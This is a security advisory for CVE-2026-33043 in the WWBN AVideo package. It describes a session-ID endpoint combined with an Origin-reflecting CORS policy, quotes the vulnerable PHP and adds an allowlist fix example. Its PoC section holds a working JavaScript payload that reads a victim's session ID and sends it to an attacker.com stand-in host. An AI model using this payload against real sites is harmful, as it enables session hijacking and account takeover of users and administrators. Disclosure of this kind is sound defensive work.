PT-2026-26000 · Packagist · Wwbn Avideo
Published 2026-03-17 · Updated 2026-03-17 · CVE-2026-33043
CVSS v3.1: 8.1
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Summary
/objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover.
Details
File: objects/phpsessionid.json.php
// Reflecting CORS headers are emitted first, then the caller's own
// session ID is returned as JSON.
allowOrigin();
$obj = new stdClass();
$obj->phpsessid = session_id();
echo json_encode($obj);
No authentication is required. The allowOrigin() function in objects/functions.php (line ~2648) reflects the request Origin (falling back to the Referer when no Origin header is present):
$HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN'];
header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN);
header("Access-Control-Allow-Credentials: true");
This means any external website can make a credentialed cross-origin request and read the session ID.
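The following is an added example of how an allowlist-based allowOrigin() would look; it is not AVideo's code or its patch, and the origins in $allowed are assumed placeholder values. Only exact, pre-approved origins receive credentialed CORS headers; everything else gets none, so a browser will not let an arbitrary site's JavaScript read the response body.

```php
<?php
// Added example, not AVideo's own code or patch: an allowlist-based
// replacement for an Origin-reflecting allowOrigin(). Only exact, pre-approved
// origins receive Access-Control-Allow-Origin; everything else gets no CORS
// headers, so a credentialed fetch from an arbitrary site cannot read the body.
// The origins in $allowed below are assumed placeholder values.

function allowOriginStrict(array $allowedOrigins): bool
{
    // Use only the Origin header. The Referer fallback in the reflecting
    // version is just as attacker-controlled and is not an origin at all.
    $origin = $_SERVER['HTTP_ORIGIN'] ?? '';

    // The response now differs per Origin; tell caches so one origin's
    // response is never replayed to another.
    header('Vary: Origin');

    // Exact, case-sensitive match. No wildcards, prefix checks or regexes,
    // which are the usual sources of allowlist bypasses.
    if ($origin === '' || !in_array($origin, $allowedOrigins, true)) {
        // A missing Origin means a same-origin or non-browser request, which
        // needs no CORS headers; an unknown Origin is simply not authorised.
        return false;
    }

    header('Access-Control-Allow-Origin: ' . $origin);
    header('Access-Control-Allow-Credentials: true');
    return true;
}

// Endpoint usage (constructed). Same-origin callers are still served; only
// allowlisted cross-origin callers get credentialed CORS access.
$allowed = ['https://videos.example.com', 'https://embed.example.com'];
$corsGranted = allowOriginStrict($allowed);

header('Content-Type: application/json');
echo json_encode(['corsGranted' => $corsGranted]);
```

Independently of the CORS fix, an endpoint that returns the caller's session ID to script gives any same-origin XSS a ready-made session exfiltration primitive, so the session ID itself should not be exposed as JSON at all.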
PoC
An attacker hosts the following page:
<script>
fetch('https://TARGET/objects/phpsessionid.json.php', {
credentials: 'include'
})
.then(r => r.json())
.then(d => {
// d.phpsessid = victim's session ID
document.location = 'https://attacker.com/steal?sid=' + d.phpsessid;
});
</script>
When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session.
Impact
Account Takeover — Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.
Fix
Weakness Enumeration
Related Identifiers
Affected Products
Wwbn Avideo